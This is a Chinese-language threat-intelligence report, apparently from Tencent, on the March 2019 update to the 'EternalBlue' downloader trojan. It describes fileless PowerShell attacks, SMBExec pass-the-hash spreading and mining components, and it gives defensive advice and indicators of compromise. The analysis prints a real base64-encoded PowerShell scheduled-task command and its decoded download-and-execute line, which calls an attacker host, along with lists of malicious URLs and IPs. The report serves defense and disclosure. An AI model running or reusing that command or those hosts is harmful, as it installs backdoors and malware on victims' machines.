永恒之蓝木马下载器再次更新:更新无文件攻击模块

2019-03-29 11:28:24
腾讯御见威胁情报中心3月28日检测到永恒之蓝下载器木马再次更新,变化主要在“无文件”攻击模块,该版本的攻击代码全部以Powershell脚本形式执行,在此前的基础上新增扫描函数Invoke-SE,并在其中通过SMBExec(pass the hash)来进行横向移动感染。

背景

腾讯御见威胁情报中心328日检测到永恒之蓝下载器木马再次更新,变化主要在无文件攻击模块,该版本的攻击代码全部以Powershell脚本形式执行,在此前的基础上新增扫描函数Invoke-SE,并在其中通过SMBExec(pass the hash)来进行横向移动感染。

此前已有的攻击方式为永恒之蓝漏洞攻击、WMI弱口令爆破、SMBClient(pass the hash),更新后木马的传播能力再次增强。新的攻击方式会在攻击后的Payload中直接在目标机器创建后门计划任务,并通过该计划任务将木马具有的多个恶意程序进行下载。

无文件攻击感染流程

“永恒之蓝”木马下载器黑产团伙活动情况时间线:

20181214

利用驱动人生系列软件升级通道下载,利用永恒之蓝漏洞攻击传播。

20181219

下载之后的木马新增Powershell后门安装。

2019109

检测到挖矿组件xmrig-32.mlz/xmrig-64.mlz下载。

2019124

木马将挖矿组件、升级后门组件分别安装为计划任务,并同时安装Powershell后门。

2019125

木马在124日的基础上再次更新,将攻击组件安装为计划任务,在攻击时新增利用mimikatz搜集登录密码,SMB弱口令爆破攻击,同时安装Powershell计划任务和hta计划任务。

2019210

将攻击模块打包方式改为Pyinstaller.

2019220

更新矿机组件,下载释放XMRig矿机,以独立进程启动挖矿。

2019223

攻击方法再次更新,新增MsSQL爆破攻击。

2019225

223日基础上继续更新,更新MsSQL爆破攻击时密码字典,添加样本文件签名。至此攻击方法集成永恒之蓝漏洞攻击、SMB爆破攻击、MsSQL爆破攻击,同时使用黑客工具mimiktazpsexec进行辅助攻击。

201936

通过已感染机器后门更新Powershell脚本横向传播模块ipc

201938

通过已感染机器后门更新PE文件横向传播模块ii.exe,采用无文件攻击技术。该团伙使用的Powershell攻击代码与20189月发现的Mykings僵尸网络变种攻击代码有诸多相似之处。

2019314

通过后门更新增肥木马大小、生成随机文件MD5逃避查杀,将生成的大文件木马拷贝到多个系统目录并通过注册表启动项、开始菜单启动项、计划任务进自启动。

2019328

更新无文件攻击模块,更后新的攻击方式为:永恒之蓝漏洞攻击、弱口令爆破+WMIC Pass the hash+ SMBClient/SMBExec,并通过Payload安装计划任务将木马具有的多个恶意程序进行下载。

详细分析

更新地址:hxxp://27.102.130.126/new.dat

MD5E05827E44D487D1782A32386123193EF

更新1:新增攻击方式:Invoke-SMBExec, 利用NTLM hash字典进行Pass the Hash攻击,然后在目标机器执行命令

内置的Hash字典:


Invoke-SMBExec攻击代码:


更新2:在Payload中通过命令添加新的Powershell后门计划任务:


计划任务名:\Microsoft\windows\Rass

启动程序:powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdwBtAD8AcwBtAGIAJwApAA==

对应的Powershell代码解码:

IEX (New-Object Net.WebClient).downloadstring('http://v.beahh.com/wm?smb')


该计划任务负责下载执行Powershell脚本wm,该脚本首先通过日志判断是否已经被感染,然后搜集详细的电脑信息上传,并下载多个木马执行,安装多个计划任务后门。具体行为如下:

1、搜集mac地址、杀软信息、系统版本、用户名、域名等信息并上传


2、判断具有管理员权限时安装计划任务\Microsoft\windows\ + $mac(下载执行hxxp://v.y6h.net/g?h),若没有管理员权限则安装计划任务$mac(下载执行hxxp://v.y6h.net/g?l


3、安装计划任务Credentials,负责下载执行Powershell脚本hxxp://128.199.64.236/new.dat?allVVV5


4、下载执行木马hxxp://128.199.64.236/mn.dat?allVVV5


5、具有管理员权限安装随机名计划任务\Microsoft\Windows\$pname(没有管理员权限则安装计划任务为$pname),执行下载的木马hxxp://128.199.64.236/ii.dat?p=allVVV5


6、下载执行木马hxxp://27.102.130.126/ddd.dat?allVVV5


7、下载执行Powershell脚本hxxp://27.102.107.137/status.json?allVVV5


8、下载执行Powershell脚本hxxp://27.102.130.126/new.dat?allVVV5

安全建议

1.服务器暂时关闭不必要的端口(如135139445),方法可参考:https://guanjia.qq.com/web_clinic/s8/585.html

2.服务器使用高强度密码,切勿使用弱口令,防止黑客暴力破解;

3.使用杀毒软件拦截可能的病毒攻击;

4.推荐企业用户部署腾讯御界高级威胁检测系统防御可能的黑客攻击。御界高级威胁检测系统,是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。


IOCs

IP

27.102.130.126

128.199.64.236

27.102.107.137

URL

hxxp://v.beahh.com/wm?smb

hxxp://v.y6h.net/g?h

hxxp://v.y6h.net/g?l

hxxp://27.102.130.126/new.dat?allVVV5

hxxp://128.199.64.236/new.dat?allVVV5

hxxp://128.199.64.236/mn.dat?allVVV5

hxxp://128.199.64.236/ii.dat?p=allVVV5

hxxp://27.102.130.126/ddd.dat?allVVV5

hxxp://27.102.107.137/status.json?allVVV5

hxxp://v.beahh.com/eb?32

hxxp://v.beahh.com/eb?64

md5

e05827e44d487d1782a32386123193ef

66ea09330bee7239fcb11a911f8e8ea3

470b4f5bc84db74ab1935186a3b5219f

8a2042827a7fcd901510e9a21c9565a8

fa13fd1bb0a2faac06cb94592dd6bb1b

6d444144d8e7a07cba1fd5b042a49012

最新资讯